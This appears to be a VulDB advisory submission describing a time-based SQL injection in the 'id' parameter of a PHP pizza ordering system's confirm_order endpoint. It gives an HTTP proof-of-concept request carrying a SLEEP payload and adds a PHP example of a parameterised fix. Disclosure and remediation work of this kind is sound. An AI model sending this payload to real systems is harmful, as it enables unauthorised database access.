| Title | SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order' |
|---|---|

Description:

Affected Software:
SourceCodester Online Pizza Ordering System v1.0
https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391

Tested On:
Ubuntu Server 22.04.3 LTS

Affected URL:
http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order

Request:

```http
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

id=1
```

Affected Parameter:
id

Proof of Concept:

```http
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx

id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)
```

Impact:
An SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials.

Summary:
An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.
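As an added example (not code from the Online Pizza Ordering System or from the submitter), this is the shape of a `confirm_order` handler that closes the weakness described in the summary: the `id` value is validated as a positive integer and bound as a query parameter instead of being concatenated into the SQL text. The table and column names (`orders`, `status`), the status value and the DSN/credentials are assumptions.

```php
<?php
// Added example, not the project's own code. Table/column names, the
// "confirmed" status value and the DSN are assumptions.

// Vulnerable shape this replaces (assumed, for contrast):
//   $db->query("UPDATE orders SET status = 1 WHERE id = " . $_POST['id']);
// With that shape, "1 AND (SELECT ... SLEEP(15) ...)" is executed as SQL.

function confirm_order(PDO $db, array $post): string
{
    // Strict integer validation: the advisory's payload is not an integer,
    // so it is rejected before any SQL is built.
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return json_encode(['status' => 'error', 'msg' => 'invalid order id']);
    }

    // Parameter binding keeps the value out of the query text entirely,
    // so the validation above is defence in depth, not the only barrier.
    $stmt = $db->prepare('UPDATE orders SET status = :status WHERE id = :id');
    $stmt->bindValue(':status', 1, PDO::PARAM_INT);   // assumed: 1 = confirmed
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    return json_encode(['status' => $stmt->rowCount() === 1 ? 'ok' : 'not_found']);
}

// Assumed connection details. Emulated prepares are disabled so the MySQL
// server, not the PDO driver, performs the parameter binding.
$db = new PDO('mysql:host=127.0.0.1;dbname=opos;charset=utf8mb4', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

if (($_GET['action'] ?? '') === 'confirm_order' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    header('Content-Type: application/json');
    echo confirm_order($db, $_POST);
}
```

A request body of `id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)` now returns a 400 immediately, which is also the behaviour to check for when verifying a fix for this report.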
| User | simon.davis8080 (UID 54983) |
|---|---|
| Submitted | 2023-10-05 10:30 AM (3 years ago) |
| Moderated | 2023-10-05 12:01 PM (2 hours later) |
| Status | Accepted |
| VulDB Entry | 241384 [SourceCodester Online Pizza Ordering System 1.0 ajax.php?action=confirm_order id SQL Injection] |
| Points | 17 |